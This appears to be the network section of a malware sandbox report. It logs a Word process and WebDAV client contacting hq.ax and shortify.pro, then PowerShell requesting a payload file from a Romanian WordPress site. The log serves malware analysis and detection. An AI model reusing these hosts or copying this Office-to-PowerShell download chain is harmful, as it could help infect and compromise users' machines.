2024-07-26 11:02:36 UTC	152	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 68 71 2e 61 78 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hq.ax
2024-07-26 11:02:36 UTC	771	IN	HTTP/1.1 302 Found Date: Fri, 26 Jul 2024 11:02:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: * access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,OPTIONS access-control-allow-origin: * location: https://shortify.pro x-cloud-trace-context: c225d53609a49c7cd2462d93030ce50b CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g9S3eGNp085WhhWMCyNaU%2BAb3BimdnBEfEZueTc%2FavGB0tGnaDZuBFLCIZE7HeRk9bzm120yilcs64dMaYx5tzdTDdnkp4siGwJKQBpn1Ng%2BlDlhk6OmAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5fe6cb27c9a-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.22	49171	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:37 UTC	159	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 68 6f 72 74 69 66 79 2e 70 72 6f 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: shortify.pro
2024-07-26 11:02:37 UTC	764	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 26 Jul 2024 11:02:37 GMT Content-Length: 131 Connection: close retry-after: 0 accept-ranges: bytes via: 1.1 varnish x-served-by: cache-lga21948-LGA x-cache: MISS x-cache-hits: 0 x-timer: S1721991757.360296,VS0,VE0 x-fastly-request-id: 16a7ff55ab63929f868489cfb271a918a9d27c8e CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aBR%2FnOU5dwDcvkVbTdZreYEIoaVHmqOmAaIy4lENr5KdN%2FkMFFoH8Y2LBKEvc%2BtCEXMh4qVLISZRwYIqG0f4TonDyQCAMy%2BywG4ZPbE4epP368oVAcCl4ps84%2F7B2pk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e603691942d7-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:37 UTC	131	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.22	49172	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:38 UTC	152	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 68 71 2e 61 78 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hq.ax
2024-07-26 11:02:38 UTC	771	IN	HTTP/1.1 302 Found Date: Fri, 26 Jul 2024 11:02:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: * access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,OPTIONS access-control-allow-origin: * location: https://shortify.pro x-cloud-trace-context: e26b949ab0336640b50893fdbd8c8e91 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eJeues%2F8HFcNVg5mgds6FCeIDvXZpKMDp0nHJHeqAS14fFSFp596lLi43bFXQkrC%2BjmaSdGcKImKeIqas5OkNsVtTOJTi74%2BzMdHF9tsSzklJs1I8MmrXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e6098ebc4297-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.22	49173	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:39 UTC	159	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 68 6f 72 74 69 66 79 2e 70 72 6f 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: shortify.pro
2024-07-26 11:02:39 UTC	764	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 26 Jul 2024 11:02:39 GMT Content-Length: 131 Connection: close retry-after: 0 accept-ranges: bytes via: 1.1 varnish x-served-by: cache-lga21929-LGA x-cache: MISS x-cache-hits: 0 x-timer: S1721991759.154828,VS0,VE0 x-fastly-request-id: 17360857822fbf9a024f5ef2c07e853896344c2c CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mecksFhZZSSo01J91T0CYA7GFyZhr2VZs5P%2FSKQ%2BQLUA0tQANJ8BWU3w4erphWnPUTZ0fCEXQQqDLnl2PwFvhUj%2Fm6YLJxxpuzMKwb%2BOxrCNKGoCPggex7vocRjB%2FC4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e60ea820429b-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:39 UTC	131	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49174	188.114.96.3	443	3100	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:39 UTC	128	OUT	HEAD /Oi8 HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: hq.ax Content-Length: 0 Connection: Keep-Alive
2024-07-26 11:02:40 UTC	756	IN	HTTP/1.1 302 Found Date: Fri, 26 Jul 2024 11:02:40 GMT Content-Type: text/html; charset=utf-8 Connection: close access-control-allow-headers: * access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,OPTIONS access-control-allow-origin: * location: https://shortify.pro x-cloud-trace-context: 8f6d5e0a26f2a2bb4578460990fec743 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tiJGIlg0%2B2EcJZjGreRs8tAucB74NSzDd254T68aCPyJ470f65nVzyiowvrQdAV9jxjSrRRzoYD1f2ord41gUe4s1HgndKnofpcir%2BYNGhmE4jFkU1qFxg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e6143d464216-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49175	188.114.97.3	443	3100	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:40 UTC	132	OUT	HEAD / HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: shortify.pro Content-Length: 0 Connection: Keep-Alive
2024-07-26 11:02:41 UTC	1071	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 11:02:41 GMT Content-Type: text/html; charset=utf-8 Connection: close last-modified: Thu, 25 Apr 2024 12:09:21 GMT access-control-allow-origin: * expires: Thu, 25 Jul 2024 18:19:35 GMT Cache-Control: max-age=600 x-hosts-log-append: pages_hosts_ips:{ [1] = 10.0.18.189,[2] = 10.0.3.158,[3] = 10.0.34.190,} x-proxy-cache: MISS x-github-request-id: 77A7:29F32:AED8F4:D2131C:66A294DE via: 1.1 varnish Age: 10 x-served-by: cache-lga21965-LGA x-cache: HIT x-cache-hits: 1 x-timer: S1721991761.999678,VS0,VE1 vary: Accept-Encoding x-fastly-request-id: 297268cad93d362de01afd432ed223e9107ba8e5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bjQa4dVEvQi9UwvN6p0nDv2w2blx1TWxWqug0Y8pNRKdIlF8rvzEDLS0X%2FiM9mH4hcnhjd3cLsIoaWD%2BbsE4Xr4aJuXajW9zU4lynTrptPg8nl7eFsoFaEu0An2wFwM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e61a2e55434f-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.22	49178	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:46 UTC	152	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 68 71 2e 61 78 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hq.ax
2024-07-26 11:02:46 UTC	775	IN	HTTP/1.1 302 Found Date: Fri, 26 Jul 2024 11:02:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: * access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,OPTIONS access-control-allow-origin: * location: https://shortify.pro x-cloud-trace-context: b4ca1f40f1e1a7a885f9ee6f6c5edb22 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aS5myEVX1KNNc2VV4nd5fR%2BcqZPnjVyw8k%2Buw2wBp9OPxmTgs6aRupBBRoMx2%2FYQwZ7uPDE%2BAKFKdNflAodhOMaEfaFZxrfR%2FKt09mdVrjnRg2fnBsOWdA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e63c59778c69-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.22	49179	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:47 UTC	159	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 68 6f 72 74 69 66 79 2e 70 72 6f 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: shortify.pro
2024-07-26 11:02:47 UTC	768	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 26 Jul 2024 11:02:47 GMT Content-Length: 131 Connection: close retry-after: 0 accept-ranges: bytes via: 1.1 varnish x-served-by: cache-lga21964-LGA x-cache: MISS x-cache-hits: 0 x-timer: S1721991767.286726,VS0,VE0 x-fastly-request-id: 736549aea4eb132dbb65bf5622b029e66e7fde0e CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeH%2FiH%2BIqU%2BBFrjTYo8IFgAVvVoWRDgYvV%2BEIGSbS6vjooFGwjdnkRa%2FaYcK4i%2BvpR%2BIbP5jYXOh1TG4q8G7WMuIzGd5rDIV7Zbx7t5DNtUCv528LWlM5RSE5nKZK44%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e6417f0f1899-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:47 UTC	131	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.22	49180	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:48 UTC	152	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 68 71 2e 61 78 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hq.ax
2024-07-26 11:02:48 UTC	771	IN	HTTP/1.1 302 Found Date: Fri, 26 Jul 2024 11:02:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: * access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,OPTIONS access-control-allow-origin: * location: https://shortify.pro x-cloud-trace-context: 9520f7555af2eedf38b04d43f12fc934 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XePBuPjikOkWF4KjeoEui%2Fscbz2hx58T0BuacXz6nl9WWCvDilrgOCo%2B9qdWQdmDyHaAK4tKIRAm8K7F%2BRZaK5uA38fzPZyzLE7WEFrfKHuxZNcGfOytGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e648985d72a1-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.22	49182	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:49 UTC	159	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 68 6f 72 74 69 66 79 2e 70 72 6f 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: shortify.pro
2024-07-26 11:02:49 UTC	762	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 26 Jul 2024 11:02:49 GMT Content-Length: 131 Connection: close retry-after: 0 accept-ranges: bytes via: 1.1 varnish x-served-by: cache-lga21925-LGA x-cache: MISS x-cache-hits: 0 x-timer: S1721991769.232509,VS0,VE1 x-fastly-request-id: 0eed1b8bf156e12f22df0244d2ecc0ab60f88786 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLgCy45%2BUevJghUhndcmM2Tk%2FRmVkP1tA%2FwFwwjmS0fhvLxbUdhlO0Qixy5hW5AYz6ritXWBSw1lWABTqMbAMa4B1%2BDaMxelR0UmJCKHKtsilLjnMiax1X14DeoyBsI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e64d983f0f8b-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:49 UTC	131	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.22	49188	93.113.54.56	443	1812	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:03:02 UTC	189	OUT	GET /os/transportment.pfm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: asociatiatraditiimaria.ro Connection: Keep-Alive
2024-07-26 11:03:03 UTC	518	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 26 Jul 2024 11:03:02 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-07-26 11:03:03 UTC	850	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69 Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found – Asociaia Tradiii
2024-07-26 11:03:03 UTC	14994	IN	Data Raw: 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 73 6f 63 69 61 74 69 61 74 72 61 64 69 74 69 69 6d 61 72 69 61 2e 72 6f 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 Data Ascii: /core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/asociatiatraditiimaria.ro\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportT
2024-07-26 11:03:03 UTC	16384	IN	Data Raw: 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 Data Ascii: lock-button.is-style-outline .wp-block-button__link:hover,.wp-block-buttons .wp-block-button.is-style-outline .wp-block-button__link:focus,.wp-block-buttons .wp-block-button.is-style-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-bu
